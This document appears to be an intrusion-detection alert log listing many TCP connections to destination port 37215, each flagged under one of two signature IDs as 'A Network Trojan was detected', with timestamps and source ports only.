                Timestamp:06/14/24-10:44:18.777519
                SID:2829579
                Source Port:49982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683508
                SID:2829579
                Source Port:35904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.341936
                SID:2829579
                Source Port:44440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011457
                SID:2829579
                Source Port:49742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152055
                SID:2835222
                Source Port:43324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763396
                SID:2835222
                Source Port:35462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230522
                SID:2829579
                Source Port:52976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.384331
                SID:2829579
                Source Port:44110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325983
                SID:2829579
                Source Port:43656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517774
                SID:2835222
                Source Port:42518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789533
                SID:2835222
                Source Port:57868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017894
                SID:2829579
                Source Port:42864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.688082
                SID:2829579
                Source Port:42294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.899265
                SID:2835222
                Source Port:37568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.110839
                SID:2835222
                Source Port:58154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.382094
                SID:2829579
                Source Port:58118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.772551
                SID:2835222
                Source Port:56044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716328
                SID:2835222
                Source Port:37958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.338209
                SID:2835222
                Source Port:48204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.965761
                SID:2835222
                Source Port:37380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.147929
                SID:2835222
                Source Port:36384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791428
                SID:2835222
                Source Port:48742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019851
                SID:2829579
                Source Port:44474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.906127
                SID:2829579
                Source Port:56898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.070683
                SID:2835222
                Source Port:47194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.382975
                SID:2835222
                Source Port:55982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.225348
                SID:2835222
                Source Port:41328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472915
                SID:2835222
                Source Port:50508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.675960
                SID:2829579
                Source Port:35868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.679252
                SID:2835222
                Source Port:58474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.159250
                SID:2835222
                Source Port:43648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.547792
                SID:2829579
                Source Port:34550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.906472
                SID:2835222
                Source Port:46748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878634
                SID:2829579
                Source Port:60036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.422278
                SID:2829579
                Source Port:55976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717523
                SID:2829579
                Source Port:52362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.986308
                SID:2835222
                Source Port:56994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.899293
                SID:2835222
                Source Port:54502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022749
                SID:2835222
                Source Port:59692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.722132
                SID:2835222
                Source Port:34516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861061
                SID:2829579
                Source Port:40724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.092736
                SID:2835222
                Source Port:51410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293298
                SID:2829579
                Source Port:55332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011512
                SID:2835222
                Source Port:54734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.321789
                SID:2829579
                Source Port:43968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229066
                SID:2835222
                Source Port:46074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.364958
                SID:2829579
                Source Port:53106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.997041
                SID:2835222
                Source Port:36692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133136
                SID:2829579
                Source Port:49826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277528
                SID:2829579
                Source Port:51986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451714
                SID:2829579
                Source Port:60484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032120
                SID:2829579
                Source Port:34566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761390
                SID:2829579
                Source Port:47554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.340000
                SID:2835222
                Source Port:45508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811261
                SID:2835222
                Source Port:34720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848576
                SID:2829579
                Source Port:50572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.419813
                SID:2835222
                Source Port:40548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230879
                SID:2835222
                Source Port:52004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777558
                SID:2829579
                Source Port:49948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683332
                SID:2835222
                Source Port:41672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324169
                SID:2835222
                Source Port:41312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.900240
                SID:2835222
                Source Port:48980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.544731
                SID:2835222
                Source Port:39176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293534
                SID:2835222
                Source Port:34016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503601
                SID:2829579
                Source Port:42466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.340900
                SID:2835222
                Source Port:56602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.343749
                SID:2829579
                Source Port:59154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.419754
                SID:2829579
                Source Port:40878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968454
                SID:2829579
                Source Port:50154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828618
                SID:2835222
                Source Port:48570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.830750
                SID:2829579
                Source Port:59282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421149
                SID:2829579
                Source Port:44906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.081643
                SID:2829579
                Source Port:39494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471439
                SID:2829579
                Source Port:36602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275279
                SID:2829579
                Source Port:45474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011899
                SID:2835222
                Source Port:45982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.737776
                SID:2829579
                Source Port:46166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021449
                SID:2835222
                Source Port:41940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.567265
                SID:2829579
                Source Port:36428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.996999
                SID:2829579
                Source Port:51970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.500835
                SID:2835222
                Source Port:48082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024249
                SID:2829579
                Source Port:48754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132515
                SID:2835222
                Source Port:44812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762928
                SID:2829579
                Source Port:57908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.079028
                SID:2835222
                Source Port:60134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979168
                SID:2829579
                Source Port:50746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683463
                SID:2829579
                Source Port:45670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503268
                SID:2835222
                Source Port:46132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850762
                SID:2835222
                Source Port:43918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878448
                SID:2829579
                Source Port:44790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.675375
                SID:2835222
                Source Port:55032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.940561
                SID:2829579
                Source Port:49386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.408150
                SID:2835222
                Source Port:55162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807352
                SID:2829579
                Source Port:45400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013513
                SID:2835222
                Source Port:40366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969511
                SID:2829579
                Source Port:48546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614393
                SID:2835222
                Source Port:43178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.881773
                SID:2835222
                Source Port:44038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025611
                SID:2835222
                Source Port:34146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.615962
                SID:2829579
                Source Port:43108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861768
                SID:2835222
                Source Port:42926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134316
                SID:2829579
                Source Port:50514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.681680
                SID:2829579
                Source Port:42786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.084546
                SID:2829579
                Source Port:42192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.737633
                SID:2835222
                Source Port:37412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012766
                SID:2829579
                Source Port:51970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322246
                SID:2829579
                Source Port:37684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325538
                SID:2835222
                Source Port:46982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.902023
                SID:2835222
                Source Port:53826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453256
                SID:2829579
                Source Port:40012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185067
                SID:2835222
                Source Port:47140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715690
                SID:2835222
                Source Port:51538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828446
                SID:2835222
                Source Port:45980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024869
                SID:2829579
                Source Port:42844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790210
                SID:2829579
                Source Port:34852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186180
                SID:2829579
                Source Port:42888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323070
                SID:2829579
                Source Port:39662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.985738
                SID:2835222
                Source Port:50066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.384364
                SID:2829579
                Source Port:56428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661122
                SID:2829579
                Source Port:45986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618330
                SID:2829579
                Source Port:45140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670427
                SID:2829579
                Source Port:39456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229489
                SID:2835222
                Source Port:50722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.226430
                SID:2835222
                Source Port:60306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230571
                SID:2829579
                Source Port:35974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860959
                SID:2835222
                Source Port:55430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.089792
                SID:2829579
                Source Port:55686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052532
                SID:2835222
                Source Port:33334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502350
                SID:2829579
                Source Port:46172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.183114
                SID:2829579
                Source Port:50286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.543017
                SID:2829579
                Source Port:56662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366623
                SID:2835222
                Source Port:40218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804229
                SID:2835222
                Source Port:44938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.778939
                SID:2835222
                Source Port:53424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.646421
                SID:2835222
                Source Port:57738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849420
                SID:2829579
                Source Port:33686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366562
                SID:2835222
                Source Port:39688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227807
                SID:2835222
                Source Port:57248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.031459
                SID:2835222
                Source Port:38944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829008
                SID:2835222
                Source Port:39710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676065
                SID:2829579
                Source Port:45454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.705321
                SID:2835222
                Source Port:51866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943657
                SID:2835222
                Source Port:37446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151996
                SID:2829579
                Source Port:40624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115483
                SID:2829579
                Source Port:42676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323036
                SID:2829579
                Source Port:51282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.419106
                SID:2835222
                Source Port:54226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.732520
                SID:2835222
                Source Port:36012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018758
                SID:2829579
                Source Port:59572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716493
                SID:2829579
                Source Port:49060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.877543
                SID:2829579
                Source Port:57844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181805
                SID:2829579
                Source Port:55130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383695
                SID:2835222
                Source Port:52188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849250
                SID:2835222
                Source Port:35902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.772428
                SID:2835222
                Source Port:41554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761132
                SID:2829579
                Source Port:52632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846197
                SID:2835222
                Source Port:57688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.409656
                SID:2835222
                Source Port:59358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519119
                SID:2835222
                Source Port:56244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325313
                SID:2829579
                Source Port:37342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.548655
                SID:2835222
                Source Port:58850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760781
                SID:2835222
                Source Port:60232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277000
                SID:2835222
                Source Port:42784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.051608
                SID:2835222
                Source Port:46558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.624978
                SID:2835222
                Source Port:37156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545159
                SID:2835222
                Source Port:34268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.405067
                SID:2829579
                Source Port:58328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.984870
                SID:2829579
                Source Port:58020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150224
                SID:2829579
                Source Port:51376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.682511
                SID:2829579
                Source Port:55442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.737544
                SID:2835222
                Source Port:53836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967050
                SID:2835222
                Source Port:39572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916078
                SID:2835222
                Source Port:34514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916575
                SID:2835222
                Source Port:56468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678337
                SID:2829579
                Source Port:42194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.164239
                SID:2835222
                Source Port:53280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.473472
                SID:2835222
                Source Port:45068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969783
                SID:2829579
                Source Port:34354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.148260
                SID:2829579
                Source Port:35072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132936
                SID:2829579
                Source Port:51280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.319906
                SID:2829579
                Source Port:53324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.946861
                SID:2835222
                Source Port:51548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.225918
                SID:2829579
                Source Port:34414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.288988
                SID:2835222
                Source Port:43542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290249
                SID:2829579
                Source Port:42712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850710
                SID:2829579
                Source Port:35638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860557
                SID:2835222
                Source Port:47756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.079299
                SID:2829579
                Source Port:52280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018394
                SID:2835222
                Source Port:34944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519518
                SID:2829579
                Source Port:45918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022022
                SID:2829579
                Source Port:53306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701930
                SID:2829579
                Source Port:36294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.644333
                SID:2835222
                Source Port:39078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228382
                SID:2835222
                Source Port:44636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011866
                SID:2835222
                Source Port:54722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.161605
                SID:2835222
                Source Port:60892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.000687
                SID:2835222
                Source Port:51908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025644
